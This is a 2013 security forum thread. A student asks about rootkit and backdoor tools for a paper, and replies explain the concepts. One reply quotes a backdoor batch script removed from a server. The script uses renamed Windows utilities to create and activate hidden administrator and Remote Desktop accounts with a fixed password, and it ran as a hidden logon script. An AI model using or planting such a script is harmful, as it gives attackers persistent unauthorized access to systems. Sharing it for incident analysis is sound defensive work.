.

Query on possible hacking tools

<<

sheepboi

Newbie
Newbie

Posts: 1

Joined: Thu Apr 25, 2013 2:08 pm

Post Thu Apr 25, 2013 2:17 pm

Query on possible hacking tools

Hi i am new to the forum and relatively new to security.  I have to write a paper on an attack that affected a business not too long ago and i need a little bit of help. 

As i am not very familiar with hacking tools and exploits used my cyber-criminals i need guidance on what tools could have been utilized to cause the following:

- Alter system tools to hide presence on network (rootkit),
- Create a backdoor Trojan as a means of accessing a network.

I know of a few such as armatage and metasploit but as they are pretty comprehensive and i haven't been able to find information that would indicate they could do these things.

Any direction would be brilliant!

Thanks guys.
<<

Triban

User avatar

Hero Member
Hero Member

Posts: 620

Joined: Fri Feb 19, 2010 4:17 pm

Post Thu Apr 25, 2013 5:36 pm

Re: Query on possible hacking tools

It is a very general question and doing a google search for rootkits backdoor trojan might send you in the right direction.  Metasploit could be a good resource but you need to know how to work your way through it.  Also what type of rootkit?  Master boot record?  The rootkit is typically used for persistence as it tends to sit below where traditional AV looks.  It will continue to replace live malware if someone removes it and reboots the device.  There are other uses for rootkits but they depend on what the attacker wants to accomplish.  The key to backdoors is the ability for the attacker to continually connect.  So lots to consider.
Certs: GCWN
(@)Dewser
<<

Krotch

User avatar

Newbie
Newbie

Posts: 1

Joined: Wed Sep 17, 2008 4:05 pm

Post Mon Apr 29, 2013 5:07 am

Re: Query on possible hacking tools

Well the last "backdoor" that I removed from a server was actually pretty simple. It was a batch file that had a hidden name and a hidden file extension. It was pretty invisible to casual searching. It was set as a log on script. Basically it referenced copies of some of the windows utilities that were renamed and located in system32\drivers\etc.

the script went like this:

@cd %systemroot%\system32\drivers\etc\
@1 localgroup "Remote Desktop Users" SUPPORT_388945a0 /add
@1 localgroup "Remote Desktop Users" guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes


Pretty basic, but it did the job of reactivating the accounts and resetting the passwords. Slipped by the AV pretty easily.

Return to Malware

Who is online

Users browsing this forum: No registered users and 2 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software